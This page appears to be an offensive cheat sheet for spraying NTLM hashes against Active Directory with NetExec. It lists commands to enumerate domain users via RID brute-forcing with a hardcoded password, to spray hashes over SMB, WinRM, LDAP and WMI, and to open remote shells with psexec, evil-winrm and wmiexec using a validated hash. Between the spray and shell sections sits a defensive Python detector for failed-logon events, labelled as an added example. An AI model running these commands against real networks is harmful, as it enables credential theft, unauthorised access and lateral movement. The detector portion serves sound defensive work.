>_ shadow.red

Hash Spraying with NetExec

Active Directory AD Attacks linux

Test every hash against every user across every protocol.

Get full user list from the domain

netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --rid-brute | grep -i 'sidtypeuser' | awk '{print$6}' | cut -d '\' -f2 | tee users.txt

Spray hashes over SMB

netexec smb 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

Over WinRM

netexec winrm 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

Over LDAP

netexec ldap 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

Over WMI

netexec wmi 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

The --continue-on-success flag is critical: by default NetExec stops at the first successful login.
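
From the defender's side, the spray above shows up in the Windows Security log as one source address failing NTLM network logons (event 4625, logon type 3) for many distinct accounts in a short time, sometimes followed by a success (event 4624). The detector below is an added example, not part of the original page; the record layout, the 192.0.2.x addresses, the thresholds and the function names are assumptions, and the events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def sample_events():
    """Constructed 4625/4624 records, reduced to the fields the detector reads."""
    t0 = datetime(2024, 10, 1, 9, 0, 0)
    def ev(sec, eid, ip, user):
        return {"time": t0 + timedelta(seconds=sec), "id": eid, "logon_type": 3,
                "auth_pkg": "NTLM", "ip": ip, "user": user}
    users = ["alice", "bob", "carol", "dave", "Administrator"]
    events = [ev(i, 4625, "192.0.2.50", u) for i, u in enumerate(users)]  # spray failures
    events.append(ev(10, 4624, "192.0.2.50", "Administrator"))            # one hash validates
    events += [ev(20, 4625, "192.0.2.77", "erin"),                        # ordinary mistyped
               ev(25, 4625, "192.0.2.77", "erin")]                        # password, one user
    return events

def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Return {source_ip: details} for IPs that failed NTLM network logons
    against at least `min_users` distinct accounts inside `window`."""
    fails, wins = defaultdict(list), defaultdict(list)
    for e in events:
        if e["logon_type"] != 3 or e["auth_pkg"] != "NTLM":
            continue  # only network logons over NTLM are considered
        bucket = fails if e["id"] == 4625 else wins if e["id"] == 4624 else None
        if bucket is not None:
            bucket[e["ip"]].append((e["time"], e["user"].lower()))
    alerts = {}
    for ip, rows in fails.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1  # slide the window forward
            if len({u for _, u in rows[start:end + 1]}) >= min_users:
                first = rows[start][0]
                alerts[ip] = {
                    "sprayed_users": len({u for _, u in rows}),
                    # accounts that logged on from the same source after the spray began
                    "compromised": sorted({u for t, u in wins.get(ip, []) if t >= first}),
                }
                break
    return alerts

if __name__ == "__main__":
    for ip, info in detect_spray(sample_events()).items():
        print(ip, info)
```

Accounts listed under "compromised" are the ones whose credentials should be rotated first; the source address is the host to isolate and examine.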

Get a shell with the validated hash

impacket-psexec intranet.local/Administrator@10.10.240.35 -hashes :a7f3e2b14d9058c6e8b720f5d1c93ea4
evil-winrm -u Administrator -H 'a7f3e2b14d9058c6e8b720f5d1c93ea4' -i 10.10.240.35
impacket-wmiexec intranet.local/Administrator@10.10.240.35 -hashes :a7f3e2b14d9058c6e8b720f5d1c93ea4